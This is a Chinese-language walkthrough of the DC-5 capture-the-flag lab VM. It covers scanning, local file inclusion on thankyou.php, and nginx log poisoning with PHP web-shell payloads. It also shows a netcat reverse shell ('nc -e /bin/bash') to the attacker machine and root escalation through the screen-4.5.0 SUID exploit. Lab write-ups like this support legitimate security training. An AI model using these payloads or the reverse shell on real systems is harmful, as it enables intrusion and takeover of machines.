DC-5靶机
Posted bingtang123
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了DC-5靶机相关的知识,希望对你有一定的参考价值。
仅供个人娱乐
靶机信息
下载地址:http://www.five86.com/downloads/DC-5.zip
一、主机扫描
arp-scan -l
nmap -p 1-65535 -A -sV 192.168.17.131
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-ec9d0b712b8f8c75.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
二、信息收集
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-03ce2d35097587d9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-8e556c7689fa6ab3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-220006e30e94e172.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-15a33fad1d1f5096.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
dirb http://192.168.17.131 /usr/share/wordlists/dirb/big.txt
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-43a1d0f65015ed5e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
用kali自带工具wfuzz(自带字典)扫描文件
cd /usr/share/wordlists/wfuzz/general
wfuzz -w /usr/share/wordlists/wfuzz/general/test.txt http://192.168.17.131/FUZZ.php
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-df037f98fc79ef40.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
三、漏洞利用
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-bae67564263045e5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-985fe7de66911045.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
利用文件包含
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-263ac967d81e745e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-8bb7d21f976896ce.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
远程文件包含
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-631fc6aefaa29460.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-353d66d0ed0576f0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-5d45147a3d5636e6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
日志
http://192.168.25.135/thankyou.php?file=/var/log/nginx/access.log
http://192.168.17.131/thankyou.php?file=/var/log/nginx/error.log
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-2bdc5a301962a6c1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-30bad429fca9ccd1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-2011c93a0b0cf583.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
重置靶机 ip 换为http://192.168.17.132
写入一句话
GET <?php system($_GET[‘cmd‘]); ?> HTTP/1.1
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-14b7b0a1732daa77.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-f978925b53ccc537.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://192.168.17.132/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.17.129 8888
root@kali:~/桌面# nc -lvvp 8888
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-28d573e477f7ce51.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
或者使用
GET /thankyou.php?file=<?php @eval($_REQUEST[cmd]);?> HTTP/1.1
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-d341910b5e83507b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-fbf4c3af0a02ac22.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-e47fb40aedc30078.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-68c5422b63b541ac.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
python -c ‘import pty;pty.spawn("/bin/bash")‘
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-ba49a71ca11224bf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
查找www-data用户具有suid权限的命令
find / -perm -4000 2>/dev/null
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-4fd191c3e157934b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
发现命令 /bin/screen-4.5.0
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-d7423a958994ade7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-e2089b9f2a1259c3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
根据内容进行编译 直接上传出现问题,在kali编译在蚁剑上传
root@kali:/tmp# vi libhax.c
root@kali:/tmp# gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
root@kali:/tmp# rm -f /tmp/libhax.c
root@kali:/tmp# vi rootshell.c
root@kali:/tmp# gcc -o /tmp/rootshell /tmp/rootshell.c
root@kali:/tmp# rm -f /tmp/rootshell.c
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-09820b576632ba97.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
蚁剑上传
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-c19fcbca5f030f00.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
或者使用
scp root@192.168.17.129:/tmp/libhax.so /tmp/
scp root@192.168.17.129:/tmp/rootshell /tmp/
继续按照脚本
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-fe6671fe34bb8d32.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
将41154.sh中剩下部分代码另存为dc5.sh脚本文件
并在保存dc5.sh文件输入:set ff=unix ,否则在执行脚本文件时后出错
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-304919960d0c9d89.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-88917b3a7e19b087.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
www-data@dc-5:/tmp$ chmod+x toroot.sh
www-data@dc-5:/tmp$./toroot.sh
以上是关于DC-5靶机的主要内容,如果未能解决你的问题,请参考以下文章